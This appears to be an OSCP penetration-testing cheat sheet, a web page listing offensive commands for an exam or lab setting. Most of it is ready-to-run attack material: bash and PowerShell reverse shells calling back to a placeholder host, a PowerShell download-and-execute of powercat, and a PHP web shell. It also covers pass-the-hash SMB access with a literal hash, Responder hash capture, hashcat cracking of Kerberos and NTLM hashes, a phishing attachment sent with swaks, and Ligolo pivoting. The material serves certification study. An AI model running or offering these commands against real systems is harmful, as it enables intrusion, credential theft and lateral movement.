Skip to content

OSCP Commands Cheat Sheet

HOST IP - HOST PORT -

Reverse shells - /usr/share/webshells/

Enumeration

Port Scanning on Windows:

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("<HOST_IP>", $_)) "TCP port $_ is open"} 2>$null

SMB Enumeration

NetBIOS Info

sudo nbtscan -r <HOST_IP_RANGE>

SMB Shares within WIndows Env (Shares running on dc01 )

net view \\dc01 /all
  • The administrative shares ending with the dollar sign

To Get list of Shares

netexec smb <HOST_IP> -u 'DOesnotExist' -p '' --shares

Connect to SMBClient

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

SMTP Enumeration

To Send Email using swaks:

sudo swaks -t test@supermagicorg.com --from test@supermagicorg.com --attach @config.Library-ms --server 192.168.212.199 --body @body.txt --header "Configuration Update" --suppress-data -ap

Web Enumeration

gobuster dir -u <HOST_IP_RANGE> -w /usr/share/wordlists/dirb/common.txt -t 5

XSS Test Parameters:

< > ' " { } ;

PHP Debug - <?php phpinfo(); ?> PHP RCE Snippet - <?php echo system($_REQUEST['cmd']); ?> To pass Param - <URL>&cmd=ls

Directory Traversal

  • Linux - Check for /etc/passwd
  • Windows - C:\Windows\System32\drivers\etc\hosts check for this path as it is readable by all users

Shells

Web Shells in Kali linux

cd  /usr/share/webshells/

Bash Reverse Shell

bash -i >& /dev/tcp/<HOST_IP>/4444 0>&1

To get a Bash Shell 

bash -c "bash -i >& /dev/tcp/<HOST_IP>/4444 0>&1"

Other Commands

Microsoft Version of Telnet

dism /online /Enable-Feature /FeatureName:TelnetClient

Fake Files Path:

/var/lib/inetsim/http/fakefiles

Responder - TO Collect Windows Hashes

sudo responder -I tap0

Hashcat

NTLM Password Cracking

hashcat -m 1000 user.hash rockyou.txt -r /usr/share/doc/hashcat-doc/rules/best64.rule --force

Net-NTLMv2 - NTLMv2 ( From Responder)

hashcat -m 5600 user.hash rockyou.txt --force

Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes

hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

Hashcat command to crack AS-REP Hash

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Hashcat command to crack Kerberoastable password hashes

sudo hashcat -m 13100 hash.kerberoast rockyou.txt -r /usr/share/doc/hashcat-doc/rules/best64.rule --force

Hashcat to crack Domain.desyc attacks cracking of password

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Cruch for custom password generation (Example)

crunch 6 6 -t Lab%%% > wordlist

Windows:

Copy Powercat to present directory:

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

To check if it's Power-shell or cmdline

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Downloading of a FIle

IEX (New-Object System.Net.Webclient).DownloadString("http://<HOST_IP>/powercat.ps1");powercat -c <HOST_IP> -p <HOST_PORT> -e powershell

Port Forwarding

Ligolo - https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

Ligolo agent - pivot machine

Creating a new tunnel

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

Your Own machine

./proxy -selfcert

on Pivot Machine:

wget <HOST_IP>/agent
./agent -connect <HOST_IP>:11601 -ignore-cert

WIndows:

cd 'C:\Windows\Temp\'
iwr -uri http://<LOCAL_IP>/agent.exe -Outfile agent.exe

On your machine:

ligolo-ng >> session
##Select the session
ligolo-ng >> ifconfig

Add IP tunnel to your own machine

sudo ip route add <IP ADDR RANGE OF DMZ> dev ligolo

On your Own machine ```bash ligolo-ng >> start


Now to add another machine to the existing tunnel, type the following
```bash
ligolo-ng >> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

To get a file like zip back using smb server on impacket

listener_add --addr 0.0.0.0:4445 --to 127.0.0.1:445 --tcp

For web server (8080 on the DMZ machine and 80 on our local machine)

listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp

For starting a listner

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

this is saying that on the DMZ/Pivot machine, listen on 1234 and then forward that to our machine 4321

To further add tunnels - https://medium.com/@issam.qsous/mastering-multi-pivot-strategies-unleashing-ligolo-ngs-power-double-triple-and-even-quadruple-dca6b24c404c

To connect to the same machine local port then use the following magic IP:

sudo ip route add 240.0.0.1/32 dev ligolo

Access the machine at 240.0.0.1

For every new tunnel: - Transfer the ligolo agent to that machine - Connect that agent to the previous ligolo machine IP - Add a new tunnel

sudo ip tuntap add user kali mode tun ligolo1
sudo ip link set ligolo1 up
  • Add a new route table
sudo ip route add <IP ADDR RANGE OF Prev Ligolo machine> dev ligolox

Cleanup of route table

ip route
sudo ip route del <IP route addr>

Cleanup of Tunnels

sudo ifconfig ligolo down
sudo ip link set ligolo down
sudo ip link delete ligolo

#For Ligolo1 tunnel
sudo ifconfig ligolo1 down
sudo ip link set ligolo1 down
sudo ip link delete ligolo1